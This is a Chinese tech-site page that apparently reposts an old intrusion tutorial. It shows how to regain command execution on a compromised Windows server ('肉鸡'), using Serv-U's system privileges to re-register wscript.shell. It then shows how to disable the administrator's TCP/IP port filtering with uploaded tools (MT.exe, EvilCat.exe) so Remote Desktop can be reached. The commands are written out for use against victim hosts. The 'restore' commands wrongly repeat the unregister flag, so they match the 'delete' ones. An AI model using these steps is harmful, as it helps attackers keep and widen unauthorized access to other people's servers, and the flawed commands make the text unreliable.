网站首页 > 技术文章 正文
wscript.shell × 命令行执行组件
这是因为wscript.shell改名了,或者从注册表删除了
删除方法:
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll
恢复方法:
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll
这里利用serv-u执行恢复命令
cmd /c regsvr32/u C:\windows\System32\wshom.ocx
cmd /c regsvr32/u C:\windows\System32\shell32.dll
恢复wscript.shell之后,本来不能读取的3389端口,变为可以读取了
为什么有时候3389开放却不能连接,有时候是因为防火墙,把终端端口转发到其他端口就可以连接,
但是更多的转发后依然是连接不上,哪是因为管理员在TCP/IP里设置的端口限制。
就算再怎么转都是连不上的。
我们需要把端口转为TCP/IP里设置的只允许连接的端口其中一个就可以了,
更好的办法是取消端口限制。
我们上传一个MT到肉鸡上,然后用具备系统权限的sev-u来执行命令。
上传cmd.exe,MT.exe到C盘,
就在Serv-u执行:c:\cmd.exe /c "mt -filter off"
而且运行成功,肉鸡也不会重启。
也可以传一个“解除TCPIP筛选的小工具EvilCat.exe”(有个小小缺点,运行后主机会重启)
直接运行就可以了
传到c:\EvilCat.exe
在Serv-u执行就OK了:c:\cmd.exe /c "EvilCat.exe"
猜你喜欢
- 2025-07-19 Win10系统如何卸载IE浏览器详细教程?
- 2025-07-19 windows下mysql自动备份及备份同步至NAS解决方案
- 2025-07-19 Frp内网穿透远程控制电脑桌面(使用frp内网穿透,用windows远程桌面连接)
- 2025-07-19 利用bat让文件在指定时间自动进行备份
- 2025-07-19 办公技巧:快速激活Windows系统(office日常办公使用技巧知识大全)
- 2025-07-19 cmd怎么切换d盘(cmd怎么切换到c盘根目录)
- 2025-07-19 Windows中的Oracle备份脚本(oracle 备份)
- 2025-07-19 微软远程桌面OS X版8.2.14:桌面分组等大波新功能
- 2025-07-19 如何在Windows系统中自动删除特定天数之前的文件!
- 2025-07-19 系统小技巧:一键进入 创建隐私浏览快捷模式
- 最近发表
-
- count(*)、count1(1)、count(主键)、count(字段) 哪个更快?
- 深入探索 Spring Boot3 中 MyBatis 的 association 标签用法
- js异步操作 Promise fetch API 带来的网络请求变革—仙盟创梦IDE
- HTTP状态码超详细说明_http 状态码有哪些
- 聊聊跨域的原理与解决方法_跨域解决方案及原理
- 告别懵圈!产品新人的接口文档轻松入门指南
- 在Javaweb中实现发送简单邮件_java web发布
- 优化必备基础:Oracle中常见的三种表连接方式
- Oracle常用工具使用 - AWR_oracle工具有哪些
- 搭载USB 3.1接口:msi 微星 发布 990FXA Gaming 游戏主板
- 标签列表
-
- cmd/c (90)
- c++中::是什么意思 (84)
- 标签用于 (71)
- 主键只能有一个吗 (77)
- c#console.writeline不显示 (95)
- pythoncase语句 (88)
- es6includes (74)
- sqlset (76)
- apt-getinstall-y (100)
- node_modules怎么生成 (87)
- chromepost (71)
- flexdirection (73)
- c++int转char (80)
- mysqlany_value (79)
- static函数和普通函数 (84)
- el-date-picker开始日期早于结束日期 (76)
- js判断是否是json字符串 (75)
- asynccallback (71)
- localstorage.removeitem (74)
- vector线程安全吗 (70)
- java (73)
- js数组插入 (83)
- mac安装java (72)
- 查看mysql是否启动 (70)
- 无效的列索引 (74)